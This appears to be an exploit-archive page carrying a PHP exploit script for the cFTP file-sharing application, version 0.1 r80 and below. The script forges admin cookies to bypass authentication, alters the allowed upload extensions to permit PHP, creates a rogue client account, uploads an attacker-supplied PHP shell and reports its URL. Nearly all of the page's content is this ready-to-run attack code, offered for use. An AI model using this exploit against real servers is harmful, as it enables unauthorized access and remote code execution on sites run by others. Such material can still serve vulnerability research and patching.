cFTP 0.1 r80 Shell Upload

cFTP 0.1 r80 Shell Upload: Posted Jul 30, 2011; Authored by leviathan; cFTP versions 0.1 r80 and below suffer from a shell upload vulnerability.; tags | exploit, shell; SHA-256 | 14de6b079c3f2f8eb5fca135eed93128745b81db4e2395aef033773807a3b325; Download | Favorite | View

cFTP 0.1 r80 Shell Upload

<?php
# Exploit Title: cFTP <= 0.1 (r80) Arbitrary File Upload
# Date: 2011-07-29
# Author: leviathan (vulnerability discovered by Simon Leblanc : <https://code.google.com/p/clients-oriented-ftp/issues/detail?id=78>)
# Software Link: https://code.google.com/p/clients-oriented-ftp/downloads/list
# Version: 0.1
# Tested on: linux
 
// Vulnerable URL
$url = 'http://[url domain]/cFTP/';
 
// The file to upload
$filename = dirname(__FILE__).'/info.php';
 
 
$failext = array('php', 'pl');
$username = 'hackname'.rand(0, 999999);
$cookies_injection = 'access=admin; userlevel=9'; // <-- the big error of this app :-)
 
/**
 * Call URL
 */
function curl_call_url($url, $cookies_injection, $inputs = null)
{
  $curl = curl_init();
   
  curl_setopt($curl, CURLOPT_URL, $url);
  curl_setopt($curl, CURLOPT_HEADER, false);
  curl_setopt($curl, CURLOPT_POST, true);
  curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  curl_setopt($curl, CURLOPT_COOKIE, $cookies_injection);
   
  if (is_array($inputs) === true) {
    curl_setopt($curl, CURLOPT_POSTFIELDS, $inputs);
  }
   
  $response = curl_exec($curl);
  $headers = curl_getinfo($curl);
  $error_number   = curl_errno($curl);
  $error_message  = curl_error($curl);
   
  curl_close($curl);
   
  return array($response, $headers, $error_number, $error_message);
}
 
// Add vulnerable extensions (php, pl : defined in $failext)
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection);
 
if (preg_match_all('/<input([^>]+)name="([^"]+)"([^>]+)value="([^"]+)([^>]*)>/', $response, $matches)) {
  $input = array();
  $count = count($matches[0]);
  for ($i = 0; $i < $count; $i++) {
    $input[$matches[2][$i]] = $matches[4][$i];
    if ($matches[2][$i] === 'allowed_file_types') {
      foreach ($failext as $ext) {
        if (strpos($matches[4][$i], $ext) === false) {
          $input[$matches[2][$i]] .= ','.$ext;
        }
      }
      $input[$matches[2][$i]] = str_replace(',', '|', $input[$matches[2][$i]]);
    }
  }
   
  // add select
  if (preg_match('/<option selected="selected" value="([^"]+)"/', $response, $matches)) {
    $input['timezone'] = $matches[1];
  } else {
    $input['timezone'] = 'America/Argentina/Buenos_Aires';
  }
   
  // Validate the form to add the vulnerables extensions
  list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection, $input);
   
  if (strpos($response, 'message_ok') !== false) {
    // Add new client : required to upload the file
    $input = array(
      'add_client_form_name' => $username,
      'add_client_form_user' => $username,
      'add_client_form_pass' => 'hackname',
      'add_client_form_pass2' => 'hackname',
      'add_client_form_address' => 'my address',
      'add_client_form_phone' => '000-000-000',
      //'add_client_form_notify' => '0',
      'add_client_form_email' => $username.'@example.com',
      'add_client_form_intcont' => '',
      'Submit' => 'Create account',
    );
     
    list($response, $headers, $error_number, $error_message) = curl_call_url($url.'clientform.php', $cookies_injection, $input);
     
    if (strpos($response, 'message_ok') !== false) {
      // Now upload file :-)
      $input = array(
        'name' => 'my_hack_file',
        'description' => 'It\'s my hack file',
        'clientname' => $username,
        'ufile' => '@'.$filename,
        'Submit' => 'Upload',
      );
       
      list($response, $headers, $error_number, $error_message) = curl_call_url($url.'fileupload.php', $cookies_injection, $input);
       
      if (preg_match('#<a href="([^"]+)">File uploaded correctly#', $response, $matches)) {
        // get filename
        list($response, $headers, $error_number, $error_message) = curl_call_url($url.$matches[1], $cookies_injection);
         
        if (preg_match('#<a href="([^"]+)'.basename($filename).'" target="_blank"#', $response, $matches_end)) {
          echo 'Your file is here : '.$url.$matches[1].$matches_end[1].basename($filename);
        } else {
          var_dump($response);
          echo 'fail to hack : where is the file !!!';
        }
      } else {
        var_dump($response);
        echo 'fail to hack : file not uploaded';
      }
    } else {
      var_dump($response);
      echo 'fail to hack : client not created';
    }
     
  } else {
    var_dump($response);
    echo 'fail to hack : options not changed';
  }
   
} else {
  var_dump($response);
  echo 'fail to hack : no input';
}

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

cFTP 0.1 r80 Shell Upload

cFTP 0.1 r80 Shell Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

cFTP 0.1 r80 Shell Upload

Share This

cFTP 0.1 r80 Shell Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems